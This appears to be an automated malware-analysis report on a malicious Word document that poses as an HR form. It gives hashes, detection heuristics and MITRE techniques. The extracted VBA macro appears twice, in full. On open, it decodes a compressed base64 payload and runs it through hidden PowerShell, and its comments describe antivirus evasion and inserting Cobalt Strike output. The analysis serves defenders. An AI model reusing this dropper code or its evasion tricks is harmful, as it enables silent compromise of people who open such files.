Office (OLE) malware analysis — malicious · 6328b7ae21796b32

MALICIOUS

Office (OLE)

77.5 KB Created: 2018-06-10 14:16:00 Authoring application: Microsoft Office Word First seen: 2019-12-09

MD5: 2116c009664b8f034e2b244464bb9521 SHA-1: 6d07b4f1b16ccd3c5e1afb67036031cdfb2471ac SHA-256: 6328b7ae21796b32a0431b210e2b9fa09f8580658341a1e50166b43431c4134e

350 Risk Score

Malware Insights

MITRE ATT&CK

T1059.001 PowerShell T1566.001 Spearphishing Attachment T1204.002 Malicious File

The sample contains VBA macros with an AutoOpen subroutine, which is a common technique for malicious Office documents. The script references PowerShell and uses a Shell() call, indicating an attempt to execute a secondary payload. The document body prompts the user to enable macros to fill out a form, serving as a lure.

Heuristics 10

ClamAV: Doc.Downloader.Pwshell-10001336-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Pwshell-10001336-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
Shell (smashit)
```

PowerShell reference in VBA critical OLE_VBA_PS

PowerShell reference in VBA

Matched line in script

smashit = "powershell.exe -NoP -NonI -W Hidden -Command ""Invoke-"
smashit = smashit + "Expression $(New-Object IO.StreamReader ($(New-O"

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Attribute VB_Name = "NewMacros"
Sub AutoOpen()
```
Reference to PowerShell high SC_STR_POWERSHELL

Reference to PowerShell
LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND

Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.openxmlformats.org/officeDocument/2006/bibliography In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3582 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3582 bytes
SHA-256: `9e051493cee694614afa471bf478113b4fa69c0bce9e1521d3a41d66054dbff8`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "CommandButton1, 1, 0, MSForms, CommandButton" Attribute VB_Control = "CommandButton11, 0, 1, MSForms, CommandButton" Private Sub CommandButton1_Click() MsgBox "Your HR details do not currently require confirmation or updating at present" End Sub Private Sub CommandButton11_Click() MsgBox "Your HR details do not currently require confirmation or updating at present" End Sub Private Sub Document_New() End Sub Attribute VB_Name = "NewMacros" Sub AutoOpen() 'For getting around Veil for Sophos - 'find and replace "str " (note the space" with lolcat ' find adn replace "exec" - (no space) with "smashit 'and add the following and some spaces randomly in there ' 'Dim hello As String 'hello = "test123" ' Copy content here from macro generation - Cobalt Strike ' Or from Dim lolcat As String Dim smashit As String Dim hello As String lolcat = "nVRtb9s4DP6eX0EYOsBGY9d5uV4bI8C6dN16t3Rd05fdBcFBsZlYq2" lolcat = lolcat + "y5ktw6zfLfRydZmuK+3RfLpEg+DymS7BH68M5pjM+kvMgKpa" lolcat = lolcat + "3rPKDOUXbaQSKl402gKKdSxGAst3RgZekeLnJ7ZTXcCW1LLk" lolcat = lolcat + "+lVLG71cniNEk0GtOEUuQWkueReMGtMNvYUiiV3yyKV/WVVh" lolcat = lolcat + "Zj60X/m8tAI7d4k9KRvHLZyKfWajEtLe6Rsjx+2DDbGZNO2x" lolcat = lolcat + "37nfqKa54hYe2c11iUwrnk833LDdpFQmk47xpWL5YsoQo7p+" lolcat = lolcat + "8HZx/OP366+POvz8PLL1dfr0c3t3f33/7+h0/jBGfzVHx/kF" lolcat = lolcat + "muikdtbPn0XC1ewla70/396I/jEye4UYOU61Ot+cL1GrMyj2" lolcat = lolcat + "t0iF325C1Boy2pDq47JnbjyQTY01sP+AFD5KbU6H+Zfqcygz" lolcat = lolcat + "8qMy+gD/wGYdUKQ/DxEU7a3uo1uoUlm9XsnagVBMc/ZoqSi1" lolcat = lolcat + "NfrUPQ3UEfWDJ252h9zfNEZeBnvBIZRWVJ8BnzuU29ySra8m" lolcat = lolcat + "OzaC86whIKrWIqNSzHvCY6YRXB0ecA2L+rCDBPiEJF7A11wx" hello = "test123" lolcat = lolcat + "YXlm6Oz7+E6zWuF+TUC663Wu0BzJdAjMFloh9GTIAvLRx16e" lolcat = lolcat + "/gwFuylJBsxB5qwIQQMALYJkguEgTxfSA7UxukNSMZgZiBSz" lolcat = lolcat + "U3nge7qpMFwW4F5+Tp261DaY4v0QYj1E8ixitFzzLkOZ+jnv" lolcat = lolcat + "R6tRb1ALUVM0GTgHdcimTdTgMu5ZTakjCXzOoSVxHLSLikhL" lolcat = lolcat + "cPN1oYi1lQh7/H6UAKzCmNQpPV+O3dNT6WaCwhfkS7uSItzV" lolcat = lolcat + "lFHVG7BNTFCbkLLk1/3/lVP6ByIEU4wxkvpd1zIGJBUcfqU6" lolcat = lolcat + "RauDX4X6v+OouoQfefaDBQm4DGy3VKg9qneuTWaYIzVC9CSn" lolcat = lolcat + "7YDUKqr8oKKsZU0osMRxcf4ChoRXAv6J2fDVzeeA6RzyndeQ" lolcat = lolcat + "Tj9wuL64Yv6mfKgjP1nEvFkzNuueuk1hamd3jYOmkHraPjIA" lolcat = lolcat + "w6Ya/b7Ryy3AGvwRQ5ER2/XkTUuphNUVMOIhfrBmKP4F/S4I" lolcat = lolcat + "ND6J22A35Okil4jLDWnG9bzYBfcGNsqssGq/pM9XpvFmPYZM" lolcat = lolcat + "V2HJph1QnDkI5u6EW/in5dUrkyDGiPoFbFtm9MMOTapFzSAw" lolcat = lolcat + "xUsXBZ0YSwCePNupm4rKIxJ6HTdj2vCTuQOjVy2d+HhNhkVb" lolcat = lolcat + "M+wnodqNL6eSmpp9c7zx9JxIK2AsaKhu74qBuGK+rNOF2ufg" lolcat = lolcat + "I=" smashit = "powershell.exe -NoP -NonI -W Hidden -Command ""Invoke-" smashit = smashit + "Expression $(New-Object IO.StreamReader ($(New-O" smashit = smashit + "bject IO.Compression.DeflateStream ($(New-Object" smashit = smashit + " IO.MemoryStream (,$([Convert]::FromBase64String" smashit = smashit + "(\"" " & lolcat & " \"" )))), [IO.Compression.Compr" smashit = smashit + "essionMode]::Decompress)), [Text.Encoding]::ASCI" smashit = smashit + "I)).ReadToEnd();""" Shell (smashit) End Sub

SHA-256: 9e051493cee694614afa471bf478113b4fa69c0bce9e1521d3a41d66054dbff8

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "CommandButton1, 1, 0, MSForms, CommandButton"
Attribute VB_Control = "CommandButton11, 0, 1, MSForms, CommandButton"

Private Sub CommandButton1_Click()
    MsgBox "Your HR details do not currently require confirmation or updating at present"
End Sub
 
Private Sub CommandButton11_Click()
MsgBox "Your HR details do not currently require confirmation or updating at present"
End Sub

Private Sub Document_New()

End Sub

Attribute VB_Name = "NewMacros"
Sub AutoOpen()

'For getting around Veil for Sophos -
'find and replace "str " (note the space" with lolcat
' find adn replace "exec" - (no space) with "smashit
'and add the following and some spaces randomly in there

'
'Dim hello As String
'hello = "test123"
        ' Copy content here from macro generation - Cobalt Strike
        
        ' Or from
Dim lolcat As String
Dim smashit As String
Dim hello As String
lolcat = "nVRtb9s4DP6eX0EYOsBGY9d5uV4bI8C6dN16t3Rd05fdBcFBsZlYq2"
lolcat = lolcat + "y5ktw6zfLfRydZmuK+3RfLpEg+DymS7BH68M5pjM+kvMgKpa"
lolcat = lolcat + "3rPKDOUXbaQSKl402gKKdSxGAst3RgZekeLnJ7ZTXcCW1LLk"
lolcat = lolcat + "+lVLG71cniNEk0GtOEUuQWkueReMGtMNvYUiiV3yyKV/WVVh"
lolcat = lolcat + "Zj60X/m8tAI7d4k9KRvHLZyKfWajEtLe6Rsjx+2DDbGZNO2x"
lolcat = lolcat + "37nfqKa54hYe2c11iUwrnk833LDdpFQmk47xpWL5YsoQo7p+"
lolcat = lolcat + "8HZx/OP366+POvz8PLL1dfr0c3t3f33/7+h0/jBGfzVHx/kF"
lolcat = lolcat + "muikdtbPn0XC1ewla70/396I/jEye4UYOU61Ot+cL1GrMyj2"
lolcat = lolcat + "t0iF325C1Boy2pDq47JnbjyQTY01sP+AFD5KbU6H+Zfqcygz"
lolcat = lolcat + "8qMy+gD/wGYdUKQ/DxEU7a3uo1uoUlm9XsnagVBMc/ZoqSi1"
lolcat = lolcat + "NfrUPQ3UEfWDJ252h9zfNEZeBnvBIZRWVJ8BnzuU29ySra8m"
lolcat = lolcat + "OzaC86whIKrWIqNSzHvCY6YRXB0ecA2L+rCDBPiEJF7A11wx"

hello = "test123"

lolcat = lolcat + "YXlm6Oz7+E6zWuF+TUC663Wu0BzJdAjMFloh9GTIAvLRx16e"
lolcat = lolcat + "/gwFuylJBsxB5qwIQQMALYJkguEgTxfSA7UxukNSMZgZiBSz"
lolcat = lolcat + "U3nge7qpMFwW4F5+Tp261DaY4v0QYj1E8ixitFzzLkOZ+jnv"
lolcat = lolcat + "R6tRb1ALUVM0GTgHdcimTdTgMu5ZTakjCXzOoSVxHLSLikhL"
lolcat = lolcat + "cPN1oYi1lQh7/H6UAKzCmNQpPV+O3dNT6WaCwhfkS7uSItzV"
lolcat = lolcat + "lFHVG7BNTFCbkLLk1/3/lVP6ByIEU4wxkvpd1zIGJBUcfqU6"
lolcat = lolcat + "RauDX4X6v+OouoQfefaDBQm4DGy3VKg9qneuTWaYIzVC9CSn"
lolcat = lolcat + "7YDUKqr8oKKsZU0osMRxcf4ChoRXAv6J2fDVzeeA6RzyndeQ"
lolcat = lolcat + "Tj9wuL64Yv6mfKgjP1nEvFkzNuueuk1hamd3jYOmkHraPjIA"
lolcat = lolcat + "w6Ya/b7Ryy3AGvwRQ5ER2/XkTUuphNUVMOIhfrBmKP4F/S4I"
lolcat = lolcat + "ND6J22A35Okil4jLDWnG9bzYBfcGNsqssGq/pM9XpvFmPYZM"
lolcat = lolcat + "V2HJph1QnDkI5u6EW/in5dUrkyDGiPoFbFtm9MMOTapFzSAw"
lolcat = lolcat + "xUsXBZ0YSwCePNupm4rKIxJ6HTdj2vCTuQOjVy2d+HhNhkVb"
lolcat = lolcat + "M+wnodqNL6eSmpp9c7zx9JxIK2AsaKhu74qBuGK+rNOF2ufg"
lolcat = lolcat + "I="

smashit = "powershell.exe -NoP -NonI -W Hidden -Command ""Invoke-"
smashit = smashit + "Expression $(New-Object IO.StreamReader ($(New-O"
smashit = smashit + "bject IO.Compression.DeflateStream ($(New-Object"
smashit = smashit + " IO.MemoryStream (,$([Convert]::FromBase64String"
smashit = smashit + "(\"" " & lolcat & " \"" )))), [IO.Compression.Compr"
smashit = smashit + "essionMode]::Decompress)), [Text.Encoding]::ASCI"
smashit = smashit + "I)).ReadToEnd();"""

Shell (smashit)

End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.